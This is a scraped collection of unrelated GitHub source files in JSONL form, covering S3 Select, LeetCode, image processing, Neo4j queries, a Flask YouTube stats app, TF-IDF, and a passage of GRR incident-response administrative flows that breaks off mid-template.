'AllowQuotedRecordDelimiter': True},\n 'CompressionType': 'NONE'},\n OutputSerialization={'CSV': {}},\n)\n\n\n# 2.- Unimos los datos que vamos recibiendo en streaming\nregistros = [\"title,overview,vote_count,vote_average\\n\"]\nfor evento in resp['Payload']:\n if 'Records' in evento:\n print(evento['Records']['Payload'].decode())\n registros.append(evento['Records']['Payload'].decode())\n\n# 3.- Generamos el contenido en un String\nfile_str = ''.join(registros)\n\n# 4.- Creamos un nuevo objeto en S3\ns3.put_object(Body=file_str, Bucket='iabd-boto3',\n Key=\"TMDb_filtered.csv\")\n","repo_name":"yepes/IABD","sub_path":"aws/python/s3select.py","file_name":"s3select.py","file_ext":"py","file_size_in_byte":1036,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"4"} +{"seq_id":"6773644185","text":"class Solution:\n def minSpeedOnTime(self, dist: List[int], hour: float) -> int:\n # copy book --> binary search min speed, check if total hours <= hours\n\n # base case --> if prev stops > hour --> return -1\n if len(dist) - 1 >= hour:\n return -1\n\n left, right = 1, 10 ** 7\n\n while left <= right:\n mid = left + (right - left) // 2\n if self.getHours(dist, mid, hour) <= hour: # less hour, higher speed --> move to left to lower speed\n right = mid - 1\n else:\n left = mid + 1\n return left\n\n def getHours(self, dist, speed, hour):\n count = 0\n for i in range(len(dist)):\n if i == len(dist) - 1:\n count += dist[i] / speed\n continue\n count += math.ceil(dist[i] / speed)\n if count > hour:\n return count\n return count","repo_name":"rligithub/Leetcode","sub_path":"BinarySearch/1870. Minimum Speed to Arrive on Time.py","file_name":"1870. Minimum Speed to Arrive on Time.py","file_ext":"py","file_size_in_byte":927,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"4"} +{"seq_id":"28436849026","text":"from skimage import io\nimport cv2\nimport numpy as np\nfrom batchgenerators.utilities.file_and_folder_operations import *\nimport argparse\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-data_path\",\n help=\"percentage of the dataset used for training validation and test\")\n args = parser.parse_args()\n data_path = args.data_path\n output_path = join(data_path, 'zone_fronts')\n\n train_front_path = join(data_path, 'fronts_dilated_5', 'train')\n test_front_path = join(data_path, 'fronts_dilated_5', 'test')\n train_zone_path = join(data_path, 'zones', 'train')\n test_zone_path = join(data_path, 'zones', 'test')\n\n train_output_path = join(output_path, 'train')\n test_output_path = join(output_path, 'test')\n\n maybe_mkdir_p(output_path)\n maybe_mkdir_p(train_output_path)\n maybe_mkdir_p(test_output_path)\n\n kernel = np.ones((5, 5), 'uint8')\n\n\n # Train\n for train_file in os.listdir(train_front_path):\n print(train_file)\n # load image\n front_path = join(train_front_path, train_file)\n zone_path = join(train_zone_path, train_file[:-len('front.png')]+'zones.png')\n front = io.imread(front_path)\n zone = io.imread(zone_path)\n\n zone[front==255] = 32\n\n # store image\n output_file_path = join(train_output_path, train_file[:-len('front.png')]+'.png')\n io.imsave(output_file_path, zone)\n\n\n for test_file in os.listdir(test_front_path):\n print(test_file)\n # load image\n front_path = join(test_front_path, test_file)\n zone_path = join(test_zone_path, test_file[:-len('front.png')] + 'zones.png')\n front = io.imread(front_path)\n zone = io.imread(zone_path)\n\n zone[front == 255] = 32\n\n # store image\n output_file_path = join(test_output_path, test_file[:-len('front.png')] + '.png')\n io.imsave(output_file_path, zone)","repo_name":"ho11laqe/nnUNet_calvingfront_detection","sub_path":"utils_new/combine_labels.py","file_name":"combine_labels.py","file_ext":"py","file_size_in_byte":1953,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"4"} +{"seq_id":"36625354279","text":"import py2neo\nimport pandas as pd\nfrom numpy import int64\nfrom collections import Counter\n\ndb = py2neo.Graph(password='neo.log')\n\n# Actual Urea Cycle data codes which will be tested as possible children of high-level codes\ndf = pd.read_csv('urea_cycle_data.csv', encoding='utf-8', dtype={'Source':'str', 'SourceName':'str', 'Number of Patient':'int'})\nids = df.Source.tolist()\nn_ids = len(ids)\n\n# High-level codes which will be tested for how many data codes they are parents of\n# ID\tlevel\tbelow\tabove\tFSN\tName\tModule\nparent_df = pd.read_csv('urea_parent_nodes.csv', encoding='utf-8', dtype='str')\nparent_ids = parent_df.ID.tolist()\nn_parents = len(parent_ids)\n\n# Force integer type of the count because was putting decimal places in file...\nparent_df['n_matches'] = int64(0)\n\n# Paths leading to high-level (coarse) nodes\nprint('starting...')\nfor ii, id in enumerate(parent_ids):\n # Below (number of IDs with shortest paths less than 12 steps leading up to current ID)\n nn = db.data(\"\"\"WITH {idslist} AS ids \n UNWIND ids AS id \n MATCH p=shortestpath((o1:ObjectConcept {{ sctid: id}})-[:ISA*0..12]->(o2:ObjectConcept {{ sctid: '{id_val}' }})) \n RETURN o2.sctid as parent, collect(id) as children;\"\"\".format(idslist=str(ids), id_val=id))\n if len(nn) > 0:\n parent_node = nn[0]['parent']\n child_nodes = nn[0]['children']\n print(ii, '/', n_parents, ' : ', parent_node, ' : ', len(child_nodes))\n parent_df.loc[parent_df['ID'] == id, 'n_matches'] = len(child_nodes)\n parent_df.loc[parent_df['ID'] == id, 'match_ids'] = '|'.join(child_nodes)\n else:\n print(ii, '/', n_parents, ' : ', parent_node, ' : 0')\n\nparent_df.to_csv('urea_child_nodes.csv', index=False, encoding='utf-8')\n","repo_name":"emonson/neo4j-snomed","sub_path":"urea_child_nodes.py","file_name":"urea_child_nodes.py","file_ext":"py","file_size_in_byte":1748,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"4"} +{"seq_id":"38418562016","text":"#import os\nfrom flask import Flask, flash, redirect, render_template, request, jsonify\n#from random import randint\nimport config\nimport json\nfrom googleapiclient.discovery import build\nimport requests\nfrom isodate import parse_duration\n\napp = Flask(__name__, static_folder='static')\n\n@app.route(\"/\")\ndef stats_title():\n\n youtube = build('youtube', 'v3', developerKey=config.developer_key)\n channel_request = youtube.channels().list(\n part='snippet,statistics',\n id=config.channel_id)\n channel_response = channel_request.execute()\n\n url = f'https://www.googleapis.com/youtube/v3/search?part=snippet&channelId={config.channel_id}&maxResults=1&order=date&type=video&key={config.developer_key}'\n\n search_response = requests.get(url).json()\n video_id = search_response['items'][0]['id']['videoId']\n\n url = f'https://www.googleapis.com/youtube/v3/videos?part=contentDetails&id={video_id}&key={config.developer_key}'\n response = requests.get(url)\n data = json.loads(response.text)\n video_duration = data['items'][0]['contentDetails']['duration']\n parsed_duration = parse_duration(video_duration)\n hours = parsed_duration.seconds // 3600\n minutes = (parsed_duration.seconds % 3600) // 60\n seconds = parsed_duration.seconds % 60\n\n duration_string = f\"{hours} hours, {minutes} minutes, {seconds} seconds\"\n\n return render_template('stats.html', \\\n channel_resource=channel_response, \\\n search_resource=search_response, \\\n latest_video_duration=duration_string)\n \nif __name__ == \"__main__\":\n app.run(host='0.0.0.0', port=5000, debug=True)","repo_name":"pswapneet/yt-stats-flask","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1615,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"4"} +{"seq_id":"6325046335","text":"\"\"\"\nThis module contains tests for the Size class\n\"\"\"\n\nfrom unittest import TestCase\nfrom mock import MagicMock, patch\nfrom doboto import Size\n\n\nclass TestSize(TestCase):\n \"\"\"\n This class implements unittests for the Size class\n \"\"\"\n\n def setUp(self):\n \"\"\"\n Define resources usable by all unit tests\n \"\"\"\n\n self.test_url = \"http://abc.example.com\"\n self.test_uri = \"{}/sizes\".format(self.test_url)\n self.test_do = \"do\"\n self.test_token = \"abc123\"\n self.test_agent = \"Unit\"\n self.instantiate_args = (self.test_do, self.test_token, self.test_url, self.test_agent)\n\n self.klass_name = \"Size\"\n self.klass = getattr(Size, self.klass_name)\n\n def test_class_exists(self):\n \"\"\"\n Size class is defined\n \"\"\"\n\n self.assertTrue(hasattr(Size, self.klass_name))\n\n def test_can_instantiate(self):\n \"\"\"\n Size class can be instantiated\n \"\"\"\n\n exc_thrown = False\n\n try:\n self.klass(*self.instantiate_args)\n except Exception:\n exc_thrown = True\n\n self.assertFalse(exc_thrown)\n\n @patch('doboto.Size.Size.pages')\n def test_list_happy(self, mock_pages):\n \"\"\"\n list works with happy path\n \"\"\"\n\n size = self.klass(*self.instantiate_args)\n result = size.list()\n\n mock_pages.assert_called_with(self.test_uri, \"sizes\")\n","repo_name":"gaf3/doboto","sub_path":"tests/test_Size.py","file_name":"test_Size.py","file_ext":"py","file_size_in_byte":1434,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"4"} +{"seq_id":"26286759013","text":"\n'''Import necessary libraries'''\n\nfrom skimage import io\nfrom skimage.exposure import histogram\nfrom skimage.filters import gaussian\n#import numpy as np\nimport matplotlib.pyplot as plt\n\nfrom skimage.filters import roberts, sobel, prewitt\nimport os\npath = r'D:\\Digital_Image_Processing\\Homework_3'\n\n'''Get the path to the image'''\nos.chdir(path)\n\nimg_txt = os.listdir()[0]\n\n\n'''Problem 1'''\n\n\n'''Read the image'''\nimage = io.imread(img_txt,as_gray=True)\n'''compute the histogram of the grayscale image, using local neighborhood of \neach pixel'''\nplt.imshow(image,cmap = 'gray')\nhist, centers = histogram(image,nbins=256)\n#plt.hist(hist, bins = centers.size)\n'''Juxtapose the image with its corresponding histrgram'''\nfig, ax = plt.subplots(ncols=2, figsize=(10, 5))\nax[0].imshow(image, interpolation='nearest', cmap=plt.cm.gray)\nax[0].axis('off')\nax[1].plot(centers, hist, lw=2)\nax[1].set_title('Histogram of grey values')\n\n#####################################################################################3\n\n'''Problem 2'''\nn_cols = 4\ncmap = 'gray'\nedge_sobel = sobel(image)\nedge_roberts = roberts(image)\nedge_prewitt = prewitt(image)\nimg_list = [(image,'Original'),(edge_sobel,'Sobel filter'),(edge_roberts,'Roberts filter'),(edge_prewitt,'Prewitt filter')]\n#edge_sobel = np.reshape(edge_sobel,image.shape)\nfig,ax = plt.subplots(ncols = n_cols, figsize=(14,7))\nfor i,im in enumerate(img_list):\n ax[i].imshow(im[0],cmap=cmap)\n ax[i].axis('off')\n ax[i].set_title(im[1])\n \n##############################################################################################\n\n'''Problem 3'''\nfig,ax = plt.subplots(ncols = n_cols, figsize=(14,7))\nsigma_list = [0.3,0.8,1.0]\nax[0].imshow(image,cmap = cmap)\nax[0].axis('off')\nax[0].set_title('Original')\nfor i,im in enumerate(sigma_list):\n gauss = gaussian(image,sigma = im)\n ax[i+1].imshow(gauss,cmap = cmap)\n ax[i+1].axis('off')\n ax[i+1].set_title('Sigma = '+str(im))\n\n\n","repo_name":"tiger-bug/Digital_Image_Processing","sub_path":"Homework_3/homework.py","file_name":"homework.py","file_ext":"py","file_size_in_byte":1938,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"4"} +{"seq_id":"1578417530","text":"# Implementation of TF-IDF\n# Some ideas inspired by code at https://code.google.com/p/tfidf/\n# Used by the text_utils module to extract keywords from paper titles + abstracts\n\nimport re\nimport operator\nimport math\nfrom nltk import stem\n\nclass Tfidf(object):\n\t\n\tdef __init__(self):\n\t\tself.corpus = []\n\t\tself.idf_dict = {}\n\t\tself.num_texts = 0\n\n\tdef add_text(self, text):\n\t\t\"\"\"\n\t\tAdds the given text to the corpus by splitting it and adding each individual word as a key to the idf_dict\n\t\t(or incrementing the value if key already present)\n\t\t\"\"\"\n\t\tself.num_texts += 1\n\t\twords = re.split(\"[^\\w-]\", text.lower())\n\t\tword_set = set(words)\n\n\t\tfor word in word_set:\n\t\t\tif word in self.idf_dict:\n\t\t\t\tself.idf_dict[word] += 1\n\t\t\telse:\n\t\t\t\tself.idf_dict[word] = 1\n\n\n\tdef count_words(self, text):\n\t\t\"\"\"\n\t\tGiven a text, returns a dict mapping each term in the text to its frequency in the text\n\t\t\"\"\"\n\t\tword_freq = {}\n\t\tall_words = re.split(\"[^\\w-]\", text.lower())\n\t\tword_set = set(all_words)\n\t\tfor word in word_set:\n\t\t\tword_freq[word] = all_words.count(word)\n\n\t\treturn word_freq\n\n\n\tdef get_keywords(self, text, maxkw):\n\t\t\"\"\"\n\t\tGiven a text and max number, returns the highest scoring words up the max number of words\n\t\t\"\"\"\n\t\ttfidf_scores = {}\n\t\t# Get the frequency counts for each word\n\t\tword_freq = self.count_words(text)\n\t\t# Get the tf-idf score for each word\n\t\tfor word in word_freq:\n\t\t\ttfidf_scores[word] = word_freq[word] * math.log(self.num_texts / self.idf_dict[word])\n\n\t\t# Sort the words by their tfidf scores into (word, score) tuples\n\t\tword_score_pairs = sorted(tfidf_scores.items(), key=operator.itemgetter(1), reverse=True)\n\n\t\tkeywords = [word_score[0] for word_score in word_score_pairs]\n\n\t\treturn keywords[:maxkw]\n\n\tdef get_idf_dict(self):\n\t\treturn self.idf_dict\n\n\tdef get_num_texts(self):\n\t\treturn self.num_texts\n\n\n\n","repo_name":"tvzeller/SumProj","sub_path":"grc/glarc/tfidf.py","file_name":"tfidf.py","file_ext":"py","file_size_in_byte":1818,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"4"} +{"seq_id":"19130869345","text":"import os , sys,time, collections , math , pprint , itertools as it , operator as op , bisect as bs ,functools as fn\nmaxx , localsys , mod = float('inf'), 0 , int(1e9 + 7) \nnCr = lambda n, r: reduce(mul, range(n - r + 1, n + 1), 1) // factorial(r)\nceil = lambda n , x: (n+x -1 )//x \nosi, oso = '/home/priyanshu/Documents/cp/input.txt','/home/priyanshu/Documents/cp/output.txt'\nif os.path.exists(osi):\n\tsys.stdin = open(osi, 'r') ; sys.stdout = open(oso, 'w')\n\t\ninput = sys.stdin.readline\n\ndef maps():return map(int , input().split())\n\n\nn , k , x= maps() ; a = sorted(maps())\ns = sorted([(a[i] - a[i-1]) for i in range(1 , n ) if a[i] - a[i-1] > x ]) ; l = len(s) + 1\nfor i in s:\n\tp = i//x\n\tif i % x ==0:\n\t\tp-=1\n\tif p <= k :\n\t\tk-=p;l-=1\n\telse:\n\t\tbreak\nprint(l)\n","repo_name":"gitnoober/cp","sub_path":"misc/practice/stable_groups.py","file_name":"stable_groups.py","file_ext":"py","file_size_in_byte":762,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"4"} +{"seq_id":"19884970430","text":"#!/usr/bin/env python\n\"\"\"Administrative flows for managing the clients state.\"\"\"\n\n\nimport shlex\nimport threading\nimport time\nimport urllib\n\nimport logging\n\n# pylint: disable=unused-import\nfrom grr.gui import django_lib\n# pylint: enable=unused-import\nfrom grr.lib import access_control\nfrom grr.lib import aff4\nfrom grr.lib import config_lib\nfrom grr.lib import data_store\nfrom grr.lib import email_alerts\nfrom grr.lib import flow\nfrom grr.lib import rdfvalue\nfrom grr.lib import registry\nfrom grr.lib import rendering\nfrom grr.lib import stats\nfrom grr.lib import utils\nfrom grr.lib.aff4_objects import collections\nfrom grr.lib.aff4_objects import reports\nfrom grr.proto import flows_pb2\n\n\nclass AdministrativeInit(registry.InitHook):\n \"\"\"Initialize the Django environment.\"\"\"\n\n pre = [\"StatsInit\"]\n\n def RunOnce(self):\n stats.STATS.RegisterCounterMetric(\"grr_client_crashes\")\n\n\nclass ClientCrashEventListener(flow.EventListener):\n \"\"\"EventListener with additional helper methods to save crash details.\"\"\"\n\n def _AppendCrashDetails(self, path, crash_details):\n collection = aff4.FACTORY.Create(\n path, \"PackedVersionedCollection\", mode=\"rw\", token=self.token)\n\n collection.Add(crash_details)\n collection.Close(sync=False)\n\n def WriteAllCrashDetails(self, client_id, crash_details,\n flow_session_id=None, hunt_session_id=None):\n # Update last crash attribute of the client.\n client_obj = aff4.FACTORY.Create(client_id, \"VFSGRRClient\",\n token=self.token)\n client_obj.Set(client_obj.Schema.LAST_CRASH(crash_details))\n client_obj.Close(sync=False)\n\n # Duplicate the crash information in a number of places so we can find it\n # easily.\n self._AppendCrashDetails(client_id.Add(\"crashes\"), crash_details)\n self._AppendCrashDetails(aff4.ROOT_URN.Add(\"crashes\"), crash_details)\n\n if flow_session_id:\n aff4_flow = aff4.FACTORY.Open(flow_session_id, \"GRRFlow\", mode=\"rw\",\n age=aff4.NEWEST_TIME, token=self.token)\n\n aff4_flow.Set(aff4_flow.Schema.CLIENT_CRASH(crash_details))\n aff4_flow.Close(sync=False)\n\n hunt_str, hunt_id, _ = flow_session_id.Split(3)\n if hunt_str == \"hunts\":\n hunt_session_id = aff4.ROOT_URN.Add(\"hunts\").Add(hunt_id)\n if hunt_session_id != flow_session_id:\n self._AppendCrashDetails(\n hunt_session_id.Add(\"crashes\"), crash_details)\n\n\nclass GetClientStatsProcessResponseMixin(object):\n \"\"\"Mixin defining ProcessReponse() that writes client stats to datastore.\"\"\"\n\n def ProcessResponse(self, client_id, response):\n \"\"\"Actually processes the contents of the response.\"\"\"\n urn = client_id.Add(\"stats\")\n\n with aff4.FACTORY.Create(urn, \"ClientStats\", token=self.token,\n mode=\"w\") as stats_fd:\n # Only keep the average of all values that fall within one minute.\n stats_fd.AddAttribute(stats_fd.Schema.STATS(response.DownSample()))\n\n\nclass GetClientStats(flow.GRRFlow, GetClientStatsProcessResponseMixin):\n \"\"\"This flow retrieves information about the GRR client process.\"\"\"\n\n category = \"/Administrative/\"\n\n @flow.StateHandler(next_state=[\"StoreResults\"])\n def Start(self):\n self.CallClient(\"GetClientStats\", next_state=\"StoreResults\")\n\n @flow.StateHandler()\n def StoreResults(self, responses):\n \"\"\"Stores the responses.\"\"\"\n\n if not responses.success:\n self.Error(\"Failed to retrieve client stats.\")\n return\n\n for response in responses:\n self.ProcessResponse(self.client_id, response)\n\n\nclass GetClientStatsAuto(flow.WellKnownFlow,\n GetClientStatsProcessResponseMixin):\n \"\"\"This action pushes client stats to the server automatically.\"\"\"\n\n category = None\n\n well_known_session_id = rdfvalue.SessionID(\"aff4:/flows/W:Stats\")\n\n def ProcessMessage(self, message):\n \"\"\"Processes a stats response from the client.\"\"\"\n client_stats = rdfvalue.ClientStats(message.args)\n self.ProcessResponse(message.source, client_stats)\n\n\nclass DeleteGRRTempFilesArgs(rdfvalue.RDFProtoStruct):\n protobuf = flows_pb2.DeleteGRRTempFilesArgs\n\n\nclass DeleteGRRTempFiles(flow.GRRFlow):\n \"\"\"Delete all the GRR temp files in path.\n\n If path is a directory, look in the top level for filenames beginning with\n Client.tempfile_prefix, and delete them.\n\n If path is a regular file and starts with Client.tempfile_prefix, delete it.\n \"\"\"\n\n category = \"/Administrative/\"\n args_type = DeleteGRRTempFilesArgs\n\n @flow.StateHandler(next_state=\"Done\")\n def Start(self):\n \"\"\"Issue a request to delete tempfiles in directory.\"\"\"\n self.CallClient(\"DeleteGRRTempFiles\", self.args.pathspec,\n next_state=\"Done\")\n\n @flow.StateHandler()\n def Done(self, responses):\n if not responses.success:\n raise flow.FlowError(str(responses.status))\n\n for response in responses:\n self.Log(response.data)\n\n\nclass UninstallArgs(rdfvalue.RDFProtoStruct):\n protobuf = flows_pb2.UninstallArgs\n\n\nclass Uninstall(flow.GRRFlow):\n \"\"\"Removes the persistence mechanism which the client uses at boot.\n\n For Windows and OSX, this will disable the service, and then stop the service.\n For Linux this flow will fail as we haven't implemented it yet :)\n \"\"\"\n\n category = \"/Administrative/\"\n args_type = UninstallArgs\n\n @flow.StateHandler(next_state=[\"Kill\"])\n def Start(self):\n \"\"\"Start the flow and determine OS support.\"\"\"\n client = aff4.FACTORY.Open(self.client_id, token=self.token)\n system = client.Get(client.Schema.SYSTEM)\n\n if system == \"Darwin\" or system == \"Windows\":\n self.CallClient(\"Uninstall\", next_state=\"Kill\")\n else:\n self.Log(\"Unsupported platform for Uninstall\")\n\n @flow.StateHandler(next_state=\"Confirmation\")\n def Kill(self, responses):\n \"\"\"Call the kill function on the client.\"\"\"\n if not responses.success:\n self.Log(\"Failed to uninstall client.\")\n elif self.args.kill:\n self.CallClient(\"Kill\", next_state=\"Confirmation\")\n\n @flow.StateHandler(next_state=\"End\")\n def Confirmation(self, responses):\n \"\"\"Confirmation of kill.\"\"\"\n if not responses.success:\n self.Log(\"Kill failed on the client.\")\n\n\nclass Kill(flow.GRRFlow):\n \"\"\"Terminate a running client (does not disable, just kill).\"\"\"\n\n category = \"/Administrative/\"\n\n @flow.StateHandler(next_state=[\"Confirmation\"])\n def Start(self):\n \"\"\"Call the kill function on the client.\"\"\"\n self.CallClient(\"Kill\", next_state=\"Confirmation\")\n\n @flow.StateHandler(next_state=\"End\")\n def Confirmation(self, responses):\n \"\"\"Confirmation of kill.\"\"\"\n if not responses.success:\n self.Log(\"Kill failed on the client.\")\n\n\nclass UpdateConfigurationArgs(rdfvalue.RDFProtoStruct):\n protobuf = flows_pb2.UpdateConfigurationArgs\n\n\nclass UpdateConfiguration(flow.GRRFlow):\n \"\"\"Update the configuration of the client.\n\n Note: This flow is somewhat dangerous, so we don't expose it in the UI.\n \"\"\"\n\n # Still accessible (e.g. via ajax but not visible in the UI.)\n category = None\n args_type = rdfvalue.UpdateConfigurationArgs\n\n @flow.StateHandler(next_state=[\"Confirmation\"])\n def Start(self):\n \"\"\"Call the UpdateConfiguration function on the client.\"\"\"\n self.CallClient(\"UpdateConfiguration\", request=self.args.config,\n next_state=\"Confirmation\")\n\n @flow.StateHandler(next_state=\"End\")\n def Confirmation(self, responses):\n \"\"\"Confirmation.\"\"\"\n if not responses.success:\n raise flow.FlowError(\"Failed to write config. Err: {0}\".format(\n responses.status))\n\n\nclass ExecutePythonHackArgs(rdfvalue.RDFProtoStruct):\n protobuf = flows_pb2.ExecutePythonHackArgs\n\n\nclass ExecutePythonHack(flow.GRRFlow):\n \"\"\"Execute a signed python hack on a client.\"\"\"\n\n category = \"/Administrative/\"\n args_type = ExecutePythonHackArgs\n\n @flow.StateHandler(next_state=[\"Done\"])\n def Start(self):\n python_hack_root_urn = config_lib.CONFIG.Get(\"Config.python_hack_root\")\n fd = aff4.FACTORY.Open(python_hack_root_urn.Add(self.args.hack_name),\n token=self.token)\n\n if not isinstance(fd, aff4.GRRSignedBlob):\n raise RuntimeError(\"Python hack %s not found.\" % self.args.hack_name)\n\n # TODO(user): This will break if someone wants to execute lots of Python.\n for python_blob in fd:\n self.CallClient(\"ExecutePython\", python_code=python_blob,\n py_args=self.args.py_args, next_state=\"Done\")\n\n @flow.StateHandler()\n def Done(self, responses):\n response = responses.First()\n if not responses.success:\n raise flow.FlowError(\"Execute Python hack failed: %s\" % responses.status)\n if response:\n result = utils.SmartStr(response.return_val)\n # Send reply with full data, but only log the first 200 bytes.\n str_result = result[0:200]\n if len(result) >= 200:\n str_result += \"...[truncated]\"\n self.Log(\"Result: %s\" % str_result)\n self.SendReply(rdfvalue.RDFBytes(utils.SmartStr(response.return_val)))\n\n\nclass ExecuteCommandArgs(rdfvalue.RDFProtoStruct):\n protobuf = flows_pb2.ExecuteCommandArgs\n\n\nclass ExecuteCommand(flow.GRRFlow):\n \"\"\"Execute a predefined command on the client.\"\"\"\n\n args_type = ExecuteCommandArgs\n\n @flow.StateHandler(next_state=[\"Confirmation\"])\n def Start(self):\n \"\"\"Call the execute function on the client.\"\"\"\n self.CallClient(\"ExecuteCommand\", cmd=self.args.cmd,\n args=shlex.split(self.args.command_line),\n time_limit=self.args.time_limit, next_state=\"Confirmation\")\n\n @flow.StateHandler(next_state=\"End\")\n def Confirmation(self, responses):\n \"\"\"Confirmation.\"\"\"\n if responses.success:\n response = responses.First()\n self.Log((\"Execution of %s %s (return value %d, \"\n \"ran for %f seconds):\"),\n response.request.cmd,\n \" \".join(response.request.command_line),\n response.exit_status,\n # time_used is returned in microseconds.\n response.time_used / 1e6)\n try:\n # We don't want to overflow the log so we just save 100 bytes each.\n logout = response.stdout[:100]\n if len(response.stdout) > 100:\n logout += \"...\"\n logerr = response.stderr[:100]\n if len(response.stderr) > 100:\n logerr += \"...\"\n self.Log(\"Output: %s, %s\", logout, logerr)\n except ValueError:\n # The received byte buffer does not convert to unicode.\n self.Log(\"Received output not convertible to unicode.\")\n else:\n self.Log(\"Execute failed.\")\n\n\nclass Foreman(flow.WellKnownFlow):\n \"\"\"The foreman assigns new flows to clients based on their type.\n\n Clients periodically call the foreman flow to ask for new flows that might be\n scheduled for them based on their types. This allows the server to schedule\n flows for entire classes of machines based on certain criteria.\n \"\"\"\n well_known_session_id = rdfvalue.SessionID(\"aff4:/flows/W:Foreman\")\n foreman_cache = None\n\n # How often we refresh the rule set from the data store.\n cache_refresh_time = 60\n\n lock = threading.Lock()\n\n def ProcessMessage(self, message):\n \"\"\"Run the foreman on the client.\"\"\"\n # Only accept authenticated messages\n if (message.auth_state !=\n rdfvalue.GrrMessage.AuthorizationState.AUTHENTICATED):\n return\n\n now = time.time()\n\n # Maintain a cache of the foreman\n with self.lock:\n if (self.foreman_cache is None or\n now > self.foreman_cache.age + self.cache_refresh_time):\n self.foreman_cache = aff4.FACTORY.Open(\"aff4:/foreman\", mode=\"rw\",\n token=self.token)\n self.foreman_cache.age = now\n\n if message.source:\n self.foreman_cache.AssignTasksToClient(message.source)\n\n\nclass OnlineNotificationArgs(rdfvalue.RDFProtoStruct):\n protobuf = flows_pb2.OnlineNotificationArgs\n\n\nclass OnlineNotification(flow.GRRFlow):\n \"\"\"Notifies by email when a client comes online in GRR.\"\"\"\n\n category = \"/Administrative/\"\n behaviours = flow.GRRFlow.behaviours + \"BASIC\"\n\n template = \"\"\"\n

GRR Client Online Notification.

\n\n

\n Client %(client_id)s (%(hostname)s) just came online. Click\n here to access this machine.\n
This notification was created by %(creator)s.\n

\n\n

Thanks,

\n

%(signature)s

\n\"\"\"\n\n args_type = OnlineNotificationArgs\n\n @classmethod\n def GetDefaultArgs(cls, token=None):\n return cls.args_type(email=\"%s@%s\" % (\n token.username, config_lib.CONFIG.Get(\"Logging.domain\")))\n\n @flow.StateHandler(next_state=\"SendMail\")\n def Start(self):\n \"\"\"Starts processing.\"\"\"\n if self.args.email is None:\n self.args.email = self.token.username\n self.CallClient(\"Echo\", data=\"Ping\", next_state=\"SendMail\")\n\n @flow.StateHandler()\n def SendMail(self, responses):\n \"\"\"Sends a mail when the client has responded.\"\"\"\n if responses.success:\n client = aff4.FACTORY.Open(self.client_id, token=self.token)\n hostname = client.Get(client.Schema.HOSTNAME)\n\n url = urllib.urlencode(((\"c\", self.client_id),\n (\"main\", \"HostInformation\")))\n\n subject = \"GRR Client on %s became available.\" % hostname\n\n email_alerts.SendEmail(\n self.args.email, \"grr-noreply\",\n subject,\n self.template % dict(\n client_id=self.client_id,\n admin_ui=config_lib.CONFIG[\"AdminUI.url\"],\n hostname=hostname,\n urn=url,\n creator=self.token.username,\n signature=config_lib.CONFIG[\"Email.signature\"]),\n is_html=True)\n else:\n flow.FlowError(\"Error while pinging client.\")\n\n\nclass UpdateClientArgs(rdfvalue.RDFProtoStruct):\n protobuf = flows_pb2.UpdateClientArgs\n\n\nclass UpdateClient(flow.GRRFlow):\n \"\"\"Updates the GRR client to a new version replacing the current client.\n\n This will execute the specified installer on the client and then run\n an Interrogate flow.\n\n The new installer needs to be loaded into the database, generally in\n /config/executables//installers and must be signed using the\n exec signing key.\n\n Signing and upload of the file is done with config_updater.\n \"\"\"\n\n category = \"/Administrative/\"\n\n AUTHORIZED_LABELS = [\"admin\"]\n\n system_platform_mapping = {\n \"Darwin\": \"darwin\",\n \"Linux\": \"linux\",\n \"Windows\": \"windows\"}\n\n args_type = UpdateClientArgs\n\n @flow.StateHandler(next_state=\"Interrogate\")\n def Start(self):\n \"\"\"Start.\"\"\"\n blob_path = self.args.blob_path\n if not blob_path:\n # No explicit path was given, we guess a reasonable default here.\n client = aff4.FACTORY.Open(self.client_id, token=self.token)\n client_platform = client.Get(client.Schema.SYSTEM)\n if not client_platform:\n raise RuntimeError(\"Can't determine client platform, please specify.\")\n blob_urn = \"aff4:/config/executables/%s/agentupdates\" % (\n self.system_platform_mapping[client_platform])\n blob_dir = aff4.FACTORY.Open(blob_urn, token=self.token)\n updates = sorted(list(blob_dir.ListChildren()))\n if not updates:\n raise RuntimeError(\n \"No matching updates found, please specify one manually.\")\n blob_path = updates[-1]\n\n if not (\"windows\" in utils.SmartStr(self.args.blob_path) or\n \"darwin\" in utils.SmartStr(self.args.blob_path) or\n \"linux\" in utils.SmartStr(self.args.blob_path)):\n raise RuntimeError(\"Update not supported for this urn, use aff4:/config\"\n \"/executables//agentupdates/\")\n\n aff4_blobs = aff4.FACTORY.Open(blob_path, token=self.token)\n offset = 0\n write_path = \"%d\" % time.time()\n for i, blob in enumerate(aff4_blobs):\n self.CallClient(\n \"UpdateAgent\", executable=blob, more_data=i < aff4_blobs.chunks-1,\n offset=offset, write_path=write_path, next_state=\"Interrogate\")\n\n offset += len(blob.data)\n\n @flow.StateHandler(next_state=\"Done\")\n def Interrogate(self, responses):\n if not responses.success:\n self.Log(\"Installer reported an error: %s\" % responses.status)\n else:\n self.Log(\"Installer completed.\")\n self.CallFlow(\"Interrogate\", next_state=\"Done\")\n\n @flow.StateHandler()\n def Done(self):\n client = aff4.FACTORY.Open(self.client_id, token=self.token)\n info = client.Get(client.Schema.CLIENT_INFO)\n self.Log(\"Client update completed, new version: %s\" %\n info.client_version)\n\n\nclass NannyMessageHandler(ClientCrashEventListener):\n \"\"\"A listener for nanny messages.\"\"\"\n EVENTS = [\"NannyMessage\"]\n\n well_known_session_id = rdfvalue.SessionID(\"aff4:/flows/W:NannyMessage\")\n\n mail_template = \"\"\"\n

GRR nanny message received.

\n\nThe nanny for client %(client_id)s (%(hostname)s) just sent a message:
\n
\n%(message)s\n
\nClick here to access this machine.\n\n

%(signature)s

